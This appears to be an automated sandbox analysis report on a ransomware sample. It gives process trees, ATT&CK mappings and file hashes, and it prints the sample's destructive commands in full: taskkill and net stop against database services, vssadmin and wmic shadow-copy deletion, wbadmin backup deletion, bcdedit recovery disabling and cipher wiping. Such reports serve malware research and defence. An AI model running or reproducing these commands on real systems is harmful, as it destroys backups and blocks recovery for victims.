1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2752	taskkill.exe
Token: SeDebugPrivilege	2632	taskkill.exe
Token: SeDebugPrivilege	2524	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	2804	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	2724	taskkill.exe
Token: SeDebugPrivilege	860	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2760	WMIC.exe
Token: SeSecurityPrivilege	2760	WMIC.exe
Token: SeTakeOwnershipPrivilege	2760	WMIC.exe
Token: SeLoadDriverPrivilege	2760	WMIC.exe
Token: SeSystemProfilePrivilege	2760	WMIC.exe
Token: SeSystemtimePrivilege	2760	WMIC.exe
Token: SeProfSingleProcessPrivilege	2760	WMIC.exe
Token: SeIncBasePriorityPrivilege	2760	WMIC.exe
Token: SeCreatePagefilePrivilege	2760	WMIC.exe
Token: SeBackupPrivilege	2760	WMIC.exe
Token: SeRestorePrivilege	2760	WMIC.exe
Token: SeShutdownPrivilege	2760	WMIC.exe
Token: SeDebugPrivilege	2760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2760	WMIC.exe
Token: SeRemoteShutdownPrivilege	2760	WMIC.exe
Token: SeUndockPrivilege	2760	WMIC.exe
Token: SeManageVolumePrivilege	2760	WMIC.exe
Token: 33	2760	WMIC.exe
Token: 34	2760	WMIC.exe
Token: 35	2760	WMIC.exe
Token: SeBackupPrivilege	604	vssvc.exe
Token: SeRestorePrivilege	604	vssvc.exe
Token: SeAuditPrivilege	604	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1752 wrote to memory of 3000	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 3000	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 3000	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 3000	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 3000 wrote to memory of 1096	3000	cmd.exe	cmd.exe
PID 3000 wrote to memory of 1096	3000	cmd.exe	cmd.exe
PID 3000 wrote to memory of 1096	3000	cmd.exe	cmd.exe
PID 3000 wrote to memory of 1096	3000	cmd.exe	cmd.exe
PID 1752 wrote to memory of 2604	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2604	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2604	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2604	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 2604 wrote to memory of 2668	2604	cmd.exe	cmd.exe
PID 2604 wrote to memory of 2668	2604	cmd.exe	cmd.exe
PID 2604 wrote to memory of 2668	2604	cmd.exe	cmd.exe
PID 2604 wrote to memory of 2668	2604	cmd.exe	cmd.exe
PID 2668 wrote to memory of 2752	2668	cmd.exe	taskkill.exe
PID 2668 wrote to memory of 2752	2668	cmd.exe	taskkill.exe
PID 2668 wrote to memory of 2752	2668	cmd.exe	taskkill.exe
PID 1752 wrote to memory of 2652	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2652	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2652	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2652	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 2652 wrote to memory of 2776	2652	cmd.exe	cmd.exe
PID 2652 wrote to memory of 2776	2652	cmd.exe	cmd.exe
PID 2652 wrote to memory of 2776	2652	cmd.exe	cmd.exe
PID 2652 wrote to memory of 2776	2652	cmd.exe	cmd.exe
PID 2776 wrote to memory of 2496	2776	cmd.exe	taskkill.exe
PID 2776 wrote to memory of 2496	2776	cmd.exe	taskkill.exe
PID 2776 wrote to memory of 2496	2776	cmd.exe	taskkill.exe
PID 1752 wrote to memory of 2812	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2812	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2812	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2812	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 2812 wrote to memory of 2232	2812	cmd.exe	cmd.exe
PID 2812 wrote to memory of 2232	2812	cmd.exe	cmd.exe
PID 2812 wrote to memory of 2232	2812	cmd.exe	cmd.exe
PID 2812 wrote to memory of 2232	2812	cmd.exe	cmd.exe
PID 2232 wrote to memory of 2632	2232	cmd.exe	taskkill.exe
PID 2232 wrote to memory of 2632	2232	cmd.exe	taskkill.exe
PID 2232 wrote to memory of 2632	2232	cmd.exe	taskkill.exe
PID 1752 wrote to memory of 2460	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2460	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2460	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2460	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 2460 wrote to memory of 2504	2460	cmd.exe	cmd.exe
PID 2460 wrote to memory of 2504	2460	cmd.exe	cmd.exe
PID 2460 wrote to memory of 2504	2460	cmd.exe	cmd.exe
PID 2460 wrote to memory of 2504	2460	cmd.exe	cmd.exe
PID 2504 wrote to memory of 2524	2504	cmd.exe	taskkill.exe
PID 2504 wrote to memory of 2524	2504	cmd.exe	taskkill.exe
PID 2504 wrote to memory of 2524	2504	cmd.exe	taskkill.exe
PID 1752 wrote to memory of 2512	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2512	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2512	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 1752 wrote to memory of 2512	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe
PID 2512 wrote to memory of 2088	2512	cmd.exe	cmd.exe
PID 2512 wrote to memory of 2088	2512	cmd.exe	cmd.exe
PID 2512 wrote to memory of 2088	2512	cmd.exe	cmd.exe
PID 2512 wrote to memory of 2088	2512	cmd.exe	cmd.exe
PID 2088 wrote to memory of 2960	2088	cmd.exe	taskkill.exe
PID 2088 wrote to memory of 2960	2088	cmd.exe	taskkill.exe
PID 2088 wrote to memory of 2960	2088	cmd.exe	taskkill.exe
PID 1752 wrote to memory of 1796	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	cmd.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.execf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1208
- C:\Users\Admin\AppData\Local\Temp\cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
  "C:\Users\Admin\AppData\Local\Temp\cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
      4⤵
      PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2668
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2776
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sql writer.exe
        5⤵
        Kills process with taskkill
        
        PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2232
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2632
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2504
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msmdsrv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2088
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im MsDtsSrvr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    PID:1796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      4⤵
      PID:2640
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlceip.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2804
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    PID:1960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      4⤵
      PID:1264
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdlauncher.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    PID:1036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      4⤵
      PID:704
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im Ssms.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      4⤵
      PID:2716
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im SQLAGENT.EXE
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    PID:684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      4⤵
      PID:792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdhost.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:860
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:1484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      4⤵
      PID:972
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im ReportingServicesService.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    PID:1644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      4⤵
      PID:1528
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msftesql.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    PID:2308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      4⤵
      PID:2556
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    PID:2312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      4⤵
      PID:2052
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -impostgres.exe
        5⤵
        Kills process with taskkill
        
        PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:3060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      4⤵
      PID:1848
    - - C:\Windows\system32\net.exe
        
        net stop MSSQLServerADHelper100
        5⤵
        
        PID:608
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        6⤵
        
        PID:1872
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    PID:1704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
      4⤵
      PID:1876
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$ISARS
        5⤵
        
        PID:648
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ISARS
        6⤵
        
        PID:960
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    PID:2176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
      4⤵
      PID:2416
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$MSFW
        5⤵
        
        PID:1788
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        6⤵
        
        PID:2196
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    PID:2136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      4⤵
      PID:852
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$ISARS
        5⤵
        
        PID:408
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        6⤵
        
        PID:1364
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    PID:1648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      4⤵
      PID:1568
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$MSFW
        5⤵
        
        PID:1020
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        6⤵
        
        PID:768
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    PID:976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
      4⤵
      PID:1884
    - - C:\Windows\system32\net.exe
        
        net stop SQLBrowser
        5⤵
        
        PID:2100
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        6⤵
        
        PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:1292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
      4⤵
      PID:1676
    - - C:\Windows\system32\net.exe
        
        net stop REportServer$ISARS
        5⤵
        
        PID:916
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        6⤵
        
        PID:928
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    PID:576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
      4⤵
      PID:1764
    - - C:\Windows\system32\net.exe
        
        net stop SQLWriter
        5⤵
        
        PID:2396
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        6⤵
        
        PID:2068
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    PID:1332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      PID:1820
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    PID:2020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
      4⤵
      PID:1200
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete backup -keepVersion:0 -quiet
        5⤵
        Deletes system backups
        
        PID:2532
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:1664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      PID:2212
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    PID:1360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      PID:1740
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        5⤵
        
        PID:2536
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    PID:992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:2384
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe SHADOWCOPY /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2760
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:2096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      4⤵
      PID:896
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} recoverynabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:2244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:2600
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2620
- - C:\Windows\SysWOW64\cipher.exe
    cipher /w:\\?\A:
    3⤵
    - Enumerates connected drives
    PID:992
- - C:\Windows\SysWOW64\cipher.exe
    cipher /w:\\?\C:
    3⤵
    PID:860
- - C:\Windows\SysWOW64\cipher.exe
    cipher /w:\\?\F:
    3⤵
    - Enumerates connected drives
    PID:568
- C:\Users\Admin\AppData\Local\Temp\cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe -network
  2⤵
  - System policy modification
  PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:2712

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
1⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1540

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK

Filesize
1KB

MD5
30763e3ed8e778ebd7c022a3dba8d572

SHA1
70fa52cfa6eb75a36cdbf30e7243f358f2d32dd9

SHA256
6400ce6cfec403ca60858a36c478e6f7545057b307ead0e36e572d097a156b88

SHA512
47491b69721514c57394938679250addd805efa2874c08455b12ac15eb9ab2fab2e997ca3fad13b8e718fb0433933ad977ff13dc98f76342bd1344320adc6e11

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK

Filesize
1KB

MD5
f2aa84aa1ba18d196188cc8a106fbe59

SHA1
da20edd3f98e9959a5e0f6bed7777de7e9475cb1

SHA256
e4886a28d975c23cd1ab206ef741a4e243331eb56f3b3240e7854da1fea6af89

SHA512
9ce13ccb0aca5fa9f9efcc451899c7d22314cd9fc68605f478badd6c512f3ed1f971fd206d37d1fb9cd821849d35ea6ae8d67120ea1db8cc953d1789b8c2dd0d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
1KB

MD5
33846bd3c5a0c74f0199b826984f5a02

SHA1
aa3af4ba91488c5947971802f324a851e92b912c

SHA256
4611182bf7709c7687eb30bd44d1730637434859282cc98d218ac36948cbcea0

SHA512
e0d7648b3129f40087de3efc60ad867678b1321879ec9e587ab8f4115934665eeb35a631f5ca8b493724d04dd37069f0deafef293f8834b918f964c7cae37cb1

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

Filesize
1KB

MD5
0d8779c4e8776a04a14cf7f90eab2f7c

SHA1
5338499c6c46cf2b3e549e1c6f2fb9a291fdf31e

SHA256
ebd247cfae5cf40fbf29f64e20b855c40db1f0382e3d427eda262cb6b15ff3c4

SHA512
71589216d0e2539e1534095ff881a8b70bc558880f885f03f035950f6df9456e5e0cf004b7b9f94cabf39f4e6956994192666ee73c278323f5b5799a3a8cee99

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_F_COL.HXK

Filesize
1KB

MD5
5a649a9ac552a8fe3d14efc1db372b61

SHA1
863bcbf8af365c53e4a6744a0b865a06bc96f2b1

SHA256
96655ceb27c043547cd864334104bdcd1c999d6f15807ec91e01a482407e2493

SHA512
